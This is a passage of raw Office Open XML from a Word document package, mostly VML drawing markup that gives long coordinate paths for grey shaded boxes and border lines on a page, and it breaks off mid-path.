
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable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rels" ContentType="application/vnd.openxmlformats-package.relationship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ict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:371.161pt;width:0.0pt;height:470.838pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,7423" coordsize="0,9416">
        <v:shape style="position:absolute;left:10402;top:7423;width:0;height:9416" coordorigin="10402,7423" coordsize="0,9416" path="m10402,7423l10402,7423,10402,7423,10402,7423,10402,7423,10402,7423,10402,7423,10402,7424,10402,7425,10402,7426,10402,7427,10402,7428,10402,7430,10402,7432,10402,7435,10402,7438,10402,7442,10402,7446,10402,7450,10402,7455,10402,7461,10402,7467,10402,7474,10402,7482,10402,7491,10402,7500,10402,7510,10402,7521,10402,7533,10402,7545,10402,7559,10402,7574,10402,7589,10402,7606,10402,7624,10402,7642,10402,7662,10402,7683,10402,7706,10402,7729,10402,7754,10402,7780,10402,7808,10402,7837,10402,7867,10402,7899,10402,7932,10402,7967,10402,8003,10402,8041,10402,8080,10402,8121,10402,8164,10402,8208,10402,8255,10402,8303,10402,8352,10402,8404,10402,8458,10402,8513,10402,8570,10402,8630,10402,8691,10402,8755,10402,8820,10402,8888,10402,8957,10402,9029,10402,9103,10402,9180,10402,9258,10402,9339,10402,9423,10402,9508,10402,9597,10402,9687,10402,9780,10402,9876,10402,9974,10402,10075,10402,10178,10402,10284,10402,10392,10402,10504,10402,10618,10402,10735,10402,10855,10402,10977,10402,11102,10402,11231,10402,11362,10402,11496,10402,11634,10402,11774,10402,11918,10402,12064,10402,12214,10402,12367,10402,12523,10402,12682,10402,12845,10402,13011,10402,13180,10402,13353,10402,13529,10402,13709,10402,13892,10402,14078,10402,14268,10402,14462,10402,14659,10402,14860,10402,15065,10402,15274,10402,15486,10402,15702,10402,15921,10402,16145,10402,16373,10402,16604,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:370.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7410" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:7410;width:8990;height:390" coordorigin="1490,7410" coordsize="8990,390" path="m1510,7423l1510,7423,1510,7423,1510,7423,1510,7423,1510,7423,1510,7423,1511,7423,1512,7423,1512,7423,1514,7423,1515,7423,1517,7423,1519,7423,1521,7423,1524,7423,1528,7423,1532,7423,1536,7423,1541,7423,1546,7423,1552,7423,1559,7423,1566,7423,1575,7423,1583,7423,1593,7423,1603,7423,1615,7423,1627,7423,1640,7423,1654,7423,1668,7423,1684,7423,1701,7423,1719,7423,1738,7423,1758,7423,1780,7423,1802,7423,1826,7423,1851,7423,1877,7423,1904,7423,1933,7423,1963,7423,1995,7423,2028,7423,2063,7423,2099,7423,2136,7423,2175,7423,2216,7423,2259,7423,2303,7423,2348,7423,2396,7423,2445,7423,2496,7423,2549,7423,2604,7423,2660,7423,2719,7423,2779,7423,2841,7423,2906,7423,2972,7423,3041,7423,3112,7423,3184,7423,3259,7423,3336,7423,3416,7423,3498,7423,3582,7423,3668,7423,3757,7423,3848,7423,3941,7423,4037,7423,4136,7423,4236,7423,4340,7423,4446,7423,4555,7423,4666,7423,4780,7423,4897,7423,5017,7423,5139,7423,5264,7423,5392,7423,5523,7423,5657,7423,5793,7423,5933,7423,6076,7423,6222,7423,6370,7423,6522,7423,6677,7423,6835,7423,6997,7423,7161,7423,7329,7423,7500,7423,7675,7423,7853,7423,8034,7423,8219,7423,8407,7423,8598,7423,8793,7423,8992,7423,9194,7423,9400,7423,9609,7423,9823,7423,10039,7423,10260,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7423,10484,7424,10484,7424,10484,7424,10484,7424,10484,7424,10484,7425,10484,7425,10484,7425,10484,7426,10484,7426,10484,7426,10484,7427,10484,7427,10484,7428,10484,7428,10484,7429,10484,7430,10484,7430,10484,7431,10484,7432,10484,7433,10484,7434,10484,7434,10484,7435,10484,7436,10484,7438,10484,7439,10484,7440,10484,7441,10484,7442,10484,7444,10484,7445,10484,7447,10484,7448,10484,7450,10484,7452,10484,7453,10484,7455,10484,7457,10484,7459,10484,7461,10484,7463,10484,7466,10484,7468,10484,7470,10484,7473,10484,7475,10484,7478,10484,7481,10484,7483,10484,7486,10484,7489,10484,7492,10484,7496,10484,7499,10484,7502,10484,7506,10484,7509,10484,7513,10484,7517,10484,7520,10484,7524,10484,7528,10484,7533,10484,7537,10484,7541,10484,7546,10484,7550,10484,7555,10484,7560,10484,7565,10484,7570,10484,7575,10484,7581,10484,7586,10484,7592,10484,7597,10484,7603,10484,7609,10484,7615,10484,7621,10484,7628,10484,7634,10484,7641,10484,7647,10484,7654,10484,7661,10484,7668,10484,7676,10484,7683,10484,7691,10484,7699,10484,7706,10484,7714,10484,7723,10484,7731,10484,7739,10484,7748,10484,7757,10484,7766,10484,7775,10484,7784,10484,7794,10484,7803,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10483,7813,10482,7813,10482,7813,10480,7813,10479,7813,10477,7813,10475,7813,10473,7813,10470,7813,10466,7813,10462,7813,10458,7813,10453,7813,10448,7813,10442,7813,10435,7813,10428,7813,10419,7813,10411,7813,10401,7813,10391,7813,10379,7813,10367,7813,10354,7813,10340,7813,10326,7813,10310,7813,10293,7813,10275,7813,10256,7813,10236,7813,10215,7813,10192,7813,10168,7813,10143,7813,10117,7813,10090,7813,10061,7813,10031,7813,9999,7813,9966,7813,9931,7813,9895,7813,9858,7813,9819,7813,9778,7813,9735,7813,9691,7813,9646,7813,9598,7813,9549,7813,9498,7813,9445,7813,9391,7813,9334,7813,9275,7813,9215,7813,9153,7813,9088,7813,9022,7813,8953,7813,8883,7813,8810,7813,8735,7813,8658,7813,8578,7813,8497,7813,8413,7813,8326,7813,8238,7813,8146,7813,8053,7813,7957,7813,7859,7813,7758,7813,7654,7813,7548,7813,7439,7813,7328,7813,7214,7813,7097,7813,6977,7813,6855,7813,6730,7813,6602,7813,6471,7813,6337,7813,6201,7813,6061,7813,5918,7813,5773,7813,5624,7813,5472,7813,5317,7813,5159,7813,4997,7813,4833,7813,4665,7813,4494,7813,4319,7813,4141,7813,3960,7813,3776,7813,3587,7813,3396,7813,3201,7813,3002,7813,2800,7813,2594,7813,2385,7813,2172,7813,1955,7813,1734,7813,1510,7813,1510,7813,1510,7813,1510,7813,1510,7813,1510,7813,1510,7813,1510,7813,1510,7813,1510,7813,1510,7813,1510,7813,1510,7813,1510,7813,1510,7812,1510,7812,1510,7812,1510,7812,1510,7812,1510,7812,1510,7811,1510,7811,1510,7811,1510,7810,1510,7810,1510,7810,1510,7809,1510,7809,1510,7808,1510,7808,1510,7807,1510,7807,1510,7806,1510,7805,1510,7805,1510,7804,1510,7803,1510,7802,1510,7801,1510,7800,1510,7799,1510,7798,1510,7797,1510,7796,1510,7795,1510,7793,1510,7792,1510,7790,1510,7789,1510,7787,1510,7786,1510,7784,1510,7782,1510,7780,1510,7778,1510,7776,1510,7774,1510,7772,1510,7770,1510,7768,1510,7765,1510,7763,1510,7760,1510,7758,1510,7755,1510,7752,1510,7749,1510,7746,1510,7743,1510,7740,1510,7737,1510,7734,1510,7730,1510,7727,1510,7723,1510,7719,1510,7715,1510,7711,1510,7707,1510,7703,1510,7699,1510,7694,1510,7690,1510,7685,1510,7681,1510,7676,1510,7671,1510,7666,1510,7660,1510,7655,1510,7650,1510,7644,1510,7638,1510,7633,1510,7627,1510,7621,1510,7614,1510,7608,1510,7602,1510,7595,1510,7588,1510,7581,1510,7574,1510,7567,1510,7560,1510,7552,1510,7545,1510,7537,1510,7529,1510,7521,1510,7513,1510,7505,1510,7496,1510,7488,1510,7479,1510,7470,1510,7461,1510,7452,1510,7442,1510,7432,1510,7423e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:369.600pt;width:445.800pt;height:21.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:389.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7790" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:7790;width:8990;height:350" coordorigin="1490,7790" coordsize="8990,350" path="m1510,7813l1510,7813,1510,7813,1510,7813,1510,7813,1510,7813,1510,7813,1511,7813,1512,7813,1512,7813,1514,7813,1515,7813,1517,7813,1519,7813,1521,7813,1524,7813,1528,7813,1532,7813,1536,7813,1541,7813,1546,7813,1552,7813,1559,7813,1566,7813,1575,7813,1583,7813,1593,7813,1603,7813,1615,7813,1627,7813,1640,7813,1654,7813,1668,7813,1684,7813,1701,7813,1719,7813,1738,7813,1758,7813,1780,7813,1802,7813,1826,7813,1851,7813,1877,7813,1904,7813,1933,7813,1963,7813,1995,7813,2028,7813,2063,7813,2099,7813,2136,7813,2175,7813,2216,7813,2259,7813,2303,7813,2348,7813,2396,7813,2445,7813,2496,7813,2549,7813,2604,7813,2660,7813,2719,7813,2779,7813,2841,7813,2906,7813,2972,7813,3041,7813,3112,7813,3184,7813,3259,7813,3336,7813,3416,7813,3498,7813,3582,7813,3668,7813,3757,7813,3848,7813,3941,7813,4037,7813,4136,7813,4236,7813,4340,7813,4446,7813,4555,7813,4666,7813,4780,7813,4897,7813,5017,7813,5139,7813,5264,7813,5392,7813,5523,7813,5657,7813,5793,7813,5933,7813,6076,7813,6222,7813,6370,7813,6522,7813,6677,7813,6835,7813,6997,7813,7161,7813,7329,7813,7500,7813,7675,7813,7853,7813,8034,7813,8219,7813,8407,7813,8598,7813,8793,7813,8992,7813,9194,7813,9400,7813,9609,7813,9823,7813,10039,7813,10260,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7813,10484,7814,10484,7814,10484,7814,10484,7814,10484,7814,10484,7815,10484,7815,10484,7815,10484,7815,10484,7816,10484,7816,10484,7816,10484,7817,10484,7817,10484,7818,10484,7818,10484,7819,10484,7819,10484,7820,10484,7821,10484,7821,10484,7822,10484,7823,10484,7824,10484,7825,10484,7825,10484,7826,10484,7827,10484,7829,10484,7830,10484,7831,10484,7832,10484,7833,10484,7835,10484,7836,10484,7837,10484,7839,10484,7840,10484,7842,10484,7844,10484,7846,10484,7847,10484,7849,10484,7851,10484,7853,10484,7855,10484,7857,10484,7860,10484,7862,10484,7864,10484,7867,10484,7869,10484,7872,10484,7875,10484,7877,10484,7880,10484,7883,10484,7886,10484,7889,10484,7892,10484,7896,10484,7899,10484,7902,10484,7906,10484,7910,10484,7913,10484,7917,10484,7921,10484,7925,10484,7929,10484,7933,10484,7938,10484,7942,10484,7946,10484,7951,10484,7956,10484,7961,10484,7966,10484,7971,10484,7976,10484,7981,10484,7986,10484,7992,10484,7997,10484,8003,10484,8009,10484,8015,10484,8021,10484,8027,10484,8033,10484,8040,10484,8046,10484,8053,10484,8060,10484,8067,10484,8074,10484,8081,10484,8088,10484,8096,10484,8103,10484,8111,10484,8119,10484,8127,10484,8135,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10483,8143,10482,8143,10482,8143,10480,8143,10479,8143,10477,8143,10475,8143,10473,8143,10470,8143,10466,8143,10462,8143,10458,8143,10453,8143,10448,8143,10442,8143,10435,8143,10428,8143,10419,8143,10411,8143,10401,8143,10391,8143,10379,8143,10367,8143,10354,8143,10340,8143,10326,8143,10310,8143,10293,8143,10275,8143,10256,8143,10236,8143,10215,8143,10192,8143,10168,8143,10143,8143,10117,8143,10090,8143,10061,8143,10031,8143,9999,8143,9966,8143,9931,8143,9895,8143,9858,8143,9819,8143,9778,8143,9735,8143,9691,8143,9646,8143,9598,8143,9549,8143,9498,8143,9445,8143,9391,8143,9334,8143,9275,8143,9215,8143,9153,8143,9088,8143,9022,8143,8953,8143,8883,8143,8810,8143,8735,8143,8658,8143,8578,8143,8497,8143,8413,8143,8326,8143,8238,8143,8146,8143,8053,8143,7957,8143,7859,8143,7758,8143,7654,8143,7548,8143,7439,8143,7328,8143,7214,8143,7097,8143,6977,8143,6855,8143,6730,8143,6602,8143,6471,8143,6337,8143,6201,8143,6061,8143,5918,8143,5773,8143,5624,8143,5472,8143,5317,8143,5159,8143,4997,8143,4833,8143,4665,8143,4494,8143,4319,8143,4141,8143,3960,8143,3776,8143,3587,8143,3396,8143,3201,8143,3002,8143,2800,8143,2594,8143,2385,8143,2172,8143,1955,8143,1734,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8142,1510,8142,1510,8142,1510,8142,1510,8142,1510,8142,1510,8141,1510,8141,1510,8141,1510,8140,1510,8140,1510,8140,1510,8139,1510,8139,1510,8138,1510,8138,1510,8137,1510,8137,1510,8136,1510,8135,1510,8135,1510,8134,1510,8133,1510,8132,1510,8131,1510,8131,1510,8130,1510,8129,1510,8128,1510,8126,1510,8125,1510,8124,1510,8123,1510,8121,1510,8120,1510,8119,1510,8117,1510,8116,1510,8114,1510,8112,1510,8111,1510,8109,1510,8107,1510,8105,1510,8103,1510,8101,1510,8099,1510,8096,1510,8094,1510,8092,1510,8089,1510,8087,1510,8084,1510,8081,1510,8079,1510,8076,1510,8073,1510,8070,1510,8067,1510,8064,1510,8060,1510,8057,1510,8054,1510,8050,1510,8047,1510,8043,1510,8039,1510,8035,1510,8031,1510,8027,1510,8023,1510,8018,1510,8014,1510,8010,1510,8005,1510,8000,1510,7995,1510,7991,1510,7986,1510,7980,1510,7975,1510,7970,1510,7964,1510,7959,1510,7953,1510,7947,1510,7941,1510,7935,1510,7929,1510,7923,1510,7916,1510,7910,1510,7903,1510,7896,1510,7889,1510,7882,1510,7875,1510,7868,1510,7860,1510,7853,1510,7845,1510,7837,1510,7829,1510,7821,1510,7813e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:390.500pt;width:1.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7810" coordsize="30,330">
        <v:shape style="position:absolute;left:1490;top:7810;width:30;height:330" coordorigin="1490,7810" coordsize="30,330" path="m1517,7813l1517,7813,1517,7813,1517,7813,1517,7813,1517,7813,1517,7813,1517,7813,1517,7813,1517,7813,1517,7813,1517,7813,1517,7813,1517,7813,1517,7813,1517,7813,1517,7814,1517,7814,1517,7814,1517,7814,1517,7814,1517,7815,1517,7815,1517,7815,1517,7815,1517,7816,1517,7816,1517,7816,1517,7817,1517,7817,1517,7818,1517,7818,1517,7819,1517,7819,1517,7820,1517,7821,1517,7821,1517,7822,1517,7823,1517,7824,1517,7825,1517,7825,1517,7826,1517,7827,1517,7829,1517,7830,1517,7831,1517,7832,1517,7833,1517,7835,1517,7836,1517,7837,1517,7839,1517,7840,1517,7842,1517,7844,1517,7846,1517,7847,1517,7849,1517,7851,1517,7853,1517,7855,1517,7857,1517,7860,1517,7862,1517,7864,1517,7867,1517,7869,1517,7872,1517,7875,1517,7877,1517,7880,1517,7883,1517,7886,1517,7889,1517,7892,1517,7896,1517,7899,1517,7902,1517,7906,1517,7910,1517,7913,1517,7917,1517,7921,1517,7925,1517,7929,1517,7933,1517,7938,1517,7942,1517,7946,1517,7951,1517,7956,1517,7961,1517,7966,1517,7971,1517,7976,1517,7981,1517,7986,1517,7992,1517,7997,1517,8003,1517,8009,1517,8015,1517,8021,1517,8027,1517,8033,1517,8040,1517,8046,1517,8053,1517,8060,1517,8067,1517,8074,1517,8081,1517,8088,1517,8096,1517,8103,1517,8111,1517,8119,1517,8127,1517,8135,1517,8143e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:406.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8130" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:8130;width:8990;height:370" coordorigin="1490,8130" coordsize="8990,370" path="m1510,8143l1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1510,8143,1511,8143,1512,8143,1512,8143,1514,8143,1515,8143,1517,8143,1519,8143,1521,8143,1524,8143,1528,8143,1532,8143,1536,8143,1541,8143,1546,8143,1552,8143,1559,8143,1566,8143,1575,8143,1583,8143,1593,8143,1603,8143,1615,8143,1627,8143,1640,8143,1654,8143,1668,8143,1684,8143,1701,8143,1719,8143,1738,8143,1758,8143,1780,8143,1802,8143,1826,8143,1851,8143,1877,8143,1904,8143,1933,8143,1963,8143,1995,8143,2028,8143,2063,8143,2099,8143,2136,8143,2175,8143,2216,8143,2259,8143,2303,8143,2348,8143,2396,8143,2445,8143,2496,8143,2549,8143,2604,8143,2660,8143,2719,8143,2779,8143,2841,8143,2906,8143,2972,8143,3041,8143,3112,8143,3184,8143,3259,8143,3336,8143,3416,8143,3498,8143,3582,8143,3668,8143,3757,8143,3848,8143,3941,8143,4037,8143,4136,8143,4236,8143,4340,8143,4446,8143,4555,8143,4666,8143,4780,8143,4897,8143,5017,8143,5139,8143,5264,8143,5392,8143,5523,8143,5657,8143,5793,8143,5933,8143,6076,8143,6222,8143,6370,8143,6522,8143,6677,8143,6835,8143,6997,8143,7161,8143,7329,8143,7500,8143,7675,8143,7853,8143,8034,8143,8219,8143,8407,8143,8598,8143,8793,8143,8992,8143,9194,8143,9400,8143,9609,8143,9823,8143,10039,8143,10260,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8143,10484,8144,10484,8144,10484,8144,10484,8144,10484,8144,10484,8144,10484,8145,10484,8145,10484,8145,10484,8145,10484,8146,10484,8146,10484,8147,10484,8147,10484,8147,10484,8148,10484,8149,10484,8149,10484,8150,10484,8150,10484,8151,10484,8152,10484,8153,10484,8153,10484,8154,10484,8155,10484,8156,10484,8157,10484,8158,10484,8160,10484,8161,10484,8162,10484,8163,10484,8165,10484,8166,10484,8168,10484,8169,10484,8171,10484,8173,10484,8174,10484,8176,10484,8178,10484,8180,10484,8182,10484,8184,10484,8187,10484,8189,10484,8191,10484,8194,10484,8196,10484,8199,10484,8201,10484,8204,10484,8207,10484,8210,10484,8213,10484,8216,10484,8219,10484,8223,10484,8226,10484,8230,10484,8233,10484,8237,10484,8241,10484,8245,10484,8249,10484,8253,10484,8257,10484,8261,10484,8266,10484,8270,10484,8275,10484,8280,10484,8285,10484,8290,10484,8295,10484,8300,10484,8305,10484,8311,10484,8316,10484,8322,10484,8328,10484,8334,10484,8340,10484,8346,10484,8353,10484,8359,10484,8366,10484,8372,10484,8379,10484,8386,10484,8394,10484,8401,10484,8408,10484,8416,10484,8424,10484,8431,10484,8439,10484,8448,10484,8456,10484,8464,10484,8473,10484,8482,10484,8491,10484,8500,10484,8509,10484,8518,10484,8518,10484,8518,10484,8518,10484,8518,10484,8518,10484,8518,10483,8518,10482,8518,10482,8518,10480,8518,10479,8518,10477,8518,10475,8518,10473,8518,10470,8518,10466,8518,10462,8518,10458,8518,10453,8518,10448,8518,10442,8518,10435,8518,10428,8518,10419,8518,10411,8518,10401,8518,10391,8518,10379,8518,10367,8518,10354,8518,10340,8518,10326,8518,10310,8518,10293,8518,10275,8518,10256,8518,10236,8518,10215,8518,10192,8518,10168,8518,10143,8518,10117,8518,10090,8518,10061,8518,10031,8518,9999,8518,9966,8518,9931,8518,9895,8518,9858,8518,9819,8518,9778,8518,9735,8518,9691,8518,9646,8518,9598,8518,9549,8518,9498,8518,9445,8518,9391,8518,9334,8518,9275,8518,9215,8518,9153,8518,9088,8518,9022,8518,8953,8518,8883,8518,8810,8518,8735,8518,8658,8518,8578,8518,8497,8518,8413,8518,8326,8518,8238,8518,8146,8518,8053,8518,7957,8518,7859,8518,7758,8518,7654,8518,7548,8518,7439,8518,7328,8518,7214,8518,7097,8518,6977,8518,6855,8518,6730,8518,6602,8518,6471,8518,6337,8518,6201,8518,6061,8518,5918,8518,5773,8518,5624,8518,5472,8518,5317,8518,5159,8518,4997,8518,4833,8518,4665,8518,4494,8518,4319,8518,4141,8518,3960,8518,3776,8518,3587,8518,3396,8518,3201,8518,3002,8518,2800,8518,2594,8518,2385,8518,2172,8518,1955,8518,1734,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8517,1510,8517,1510,8517,1510,8517,1510,8517,1510,8516,1510,8516,1510,8516,1510,8515,1510,8515,1510,8514,1510,8514,1510,8513,1510,8513,1510,8512,1510,8512,1510,8511,1510,8510,1510,8510,1510,8509,1510,8508,1510,8507,1510,8506,1510,8505,1510,8504,1510,8503,1510,8502,1510,8501,1510,8499,1510,8498,1510,8497,1510,8495,1510,8494,1510,8492,1510,8490,1510,8489,1510,8487,1510,8485,1510,8483,1510,8481,1510,8479,1510,8477,1510,8475,1510,8473,1510,8470,1510,8468,1510,8465,1510,8463,1510,8460,1510,8457,1510,8454,1510,8451,1510,8448,1510,8445,1510,8442,1510,8439,1510,8435,1510,8432,1510,8428,1510,8424,1510,8421,1510,8417,1510,8413,1510,8409,1510,8404,1510,8400,1510,8396,1510,8391,1510,8386,1510,8382,1510,8377,1510,8372,1510,8367,1510,8361,1510,8356,1510,8351,1510,8345,1510,8339,1510,8333,1510,8327,1510,8321,1510,8315,1510,8309,1510,8302,1510,8296,1510,8289,1510,8282,1510,8275,1510,8268,1510,8261,1510,8253,1510,8246,1510,8238,1510,8230,1510,8222,1510,8214,1510,8205,1510,8197,1510,8188,1510,8180,1510,8171,1510,8162,1510,8152,1510,8143e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:406.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8130" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:8130;width:30;height:390" coordorigin="1490,8130" coordsize="30,390" path="m1517,8143l1517,8143,1517,8143,1517,8143,1517,8143,1517,8143,1517,8143,1517,8143,1517,8143,1517,8143,1517,8143,1517,8143,1517,8143,1517,8143,1517,8144,1517,8144,1517,8144,1517,8144,1517,8144,1517,8144,1517,8145,1517,8145,1517,8145,1517,8145,1517,8146,1517,8146,1517,8147,1517,8147,1517,8147,1517,8148,1517,8149,1517,8149,1517,8150,1517,8150,1517,8151,1517,8152,1517,8153,1517,8153,1517,8154,1517,8155,1517,8156,1517,8157,1517,8158,1517,8160,1517,8161,1517,8162,1517,8163,1517,8165,1517,8166,1517,8168,1517,8169,1517,8171,1517,8173,1517,8174,1517,8176,1517,8178,1517,8180,1517,8182,1517,8184,1517,8187,1517,8189,1517,8191,1517,8194,1517,8196,1517,8199,1517,8201,1517,8204,1517,8207,1517,8210,1517,8213,1517,8216,1517,8219,1517,8223,1517,8226,1517,8230,1517,8233,1517,8237,1517,8241,1517,8245,1517,8249,1517,8253,1517,8257,1517,8261,1517,8266,1517,8270,1517,8275,1517,8280,1517,8285,1517,8290,1517,8295,1517,8300,1517,8305,1517,8311,1517,8316,1517,8322,1517,8328,1517,8334,1517,8340,1517,8346,1517,8353,1517,8359,1517,8366,1517,8372,1517,8379,1517,8386,1517,8394,1517,8401,1517,8408,1517,8416,1517,8424,1517,8431,1517,8439,1517,8448,1517,8456,1517,8464,1517,8473,1517,8482,1517,8491,1517,8500,1517,8509,1517,8518e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:424.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8490" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:8490;width:8990;height:350" coordorigin="1490,8490" coordsize="8990,350" path="m1510,8518l1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1510,8518,1511,8518,1512,8518,1512,8518,1514,8518,1515,8518,1517,8518,1519,8518,1521,8518,1524,8518,1528,8518,1532,8518,1536,8518,1541,8518,1546,8518,1552,8518,1559,8518,1566,8518,1575,8518,1583,8518,1593,8518,1603,8518,1615,8518,1627,8518,1640,8518,1654,8518,1668,8518,1684,8518,1701,8518,1719,8518,1738,8518,1758,8518,1780,8518,1802,8518,1826,8518,1851,8518,1877,8518,1904,8518,1933,8518,1963,8518,1995,8518,2028,8518,2063,8518,2099,8518,2136,8518,2175,8518,2216,8518,2259,8518,2303,8518,2348,8518,2396,8518,2445,8518,2496,8518,2549,8518,2604,8518,2660,8518,2719,8518,2779,8518,2841,8518,2906,8518,2972,8518,3041,8518,3112,8518,3184,8518,3259,8518,3336,8518,3416,8518,3498,8518,3582,8518,3668,8518,3757,8518,3848,8518,3941,8518,4037,8518,4136,8518,4236,8518,4340,8518,4446,8518,4555,8518,4666,8518,4780,8518,4897,8518,5017,8518,5139,8518,5264,8518,5392,8518,5523,8518,5657,8518,5793,8518,5933,8518,6076,8518,6222,8518,6370,8518,6522,8518,6677,8518,6835,8518,6997,8518,7161,8518,7329,8518,7500,8518,7675,8518,7853,8518,8034,8518,8219,8518,8407,8518,8598,8518,8793,8518,8992,8518,9194,8518,9400,8518,9609,8518,9823,8518,10039,8518,10260,8518,10484,8518,10484,8518,10484,8518,10484,8518,10484,8518,10484,8518,10484,8518,10484,8518,10484,8518,10484,8518,10484,8518,10484,8518,10484,8519,10484,8519,10484,8519,10484,8519,10484,8519,10484,8519,10484,8519,10484,8519,10484,8520,10484,8520,10484,8520,10484,8520,10484,8521,10484,8521,10484,8521,10484,8522,10484,8522,10484,8523,10484,8523,10484,8524,10484,8524,10484,8525,10484,8525,10484,8526,10484,8527,10484,8527,10484,8528,10484,8529,10484,8530,10484,8531,10484,8532,10484,8533,10484,8534,10484,8535,10484,8536,10484,8537,10484,8539,10484,8540,10484,8541,10484,8543,10484,8544,10484,8546,10484,8547,10484,8549,10484,8551,10484,8553,10484,8555,10484,8557,10484,8559,10484,8561,10484,8563,10484,8565,10484,8567,10484,8570,10484,8572,10484,8575,10484,8577,10484,8580,10484,8583,10484,8585,10484,8588,10484,8591,10484,8595,10484,8598,10484,8601,10484,8604,10484,8608,10484,8611,10484,8615,10484,8619,10484,8622,10484,8626,10484,8630,10484,8634,10484,8639,10484,8643,10484,8647,10484,8652,10484,8656,10484,8661,10484,8666,10484,8671,10484,8676,10484,8681,10484,8686,10484,8692,10484,8697,10484,8703,10484,8708,10484,8714,10484,8720,10484,8726,10484,8732,10484,8739,10484,8745,10484,8752,10484,8758,10484,8765,10484,8772,10484,8779,10484,8786,10484,8794,10484,8801,10484,8809,10484,8816,10484,8824,10484,8832,10484,8840,10484,8848,10484,8848,10484,8848,10484,8848,10484,8848,10484,8848,10484,8848,10483,8848,10482,8848,10482,8848,10480,8848,10479,8848,10477,8848,10475,8848,10473,8848,10470,8848,10466,8848,10462,8848,10458,8848,10453,8848,10448,8848,10442,8848,10435,8848,10428,8848,10419,8848,10411,8848,10401,8848,10391,8848,10379,8848,10367,8848,10354,8848,10340,8848,10326,8848,10310,8848,10293,8848,10275,8848,10256,8848,10236,8848,10215,8848,10192,8848,10168,8848,10143,8848,10117,8848,10090,8848,10061,8848,10031,8848,9999,8848,9966,8848,9931,8848,9895,8848,9858,8848,9819,8848,9778,8848,9735,8848,9691,8848,9646,8848,9598,8848,9549,8848,9498,8848,9445,8848,9391,8848,9334,8848,9275,8848,9215,8848,9153,8848,9088,8848,9022,8848,8953,8848,8883,8848,8810,8848,8735,8848,8658,8848,8578,8848,8497,8848,8413,8848,8326,8848,8238,8848,8146,8848,8053,8848,7957,8848,7859,8848,7758,8848,7654,8848,7548,8848,7439,8848,7328,8848,7214,8848,7097,8848,6977,8848,6855,8848,6730,8848,6602,8848,6471,8848,6337,8848,6201,8848,6061,8848,5918,8848,5773,8848,5624,8848,5472,8848,5317,8848,5159,8848,4997,8848,4833,8848,4665,8848,4494,8848,4319,8848,4141,8848,3960,8848,3776,8848,3587,8848,3396,8848,3201,8848,3002,8848,2800,8848,2594,8848,2385,8848,2172,8848,1955,8848,1734,8848,1510,8848,1510,8848,1510,8848,1510,8848,1510,8848,1510,8848,1510,8848,1510,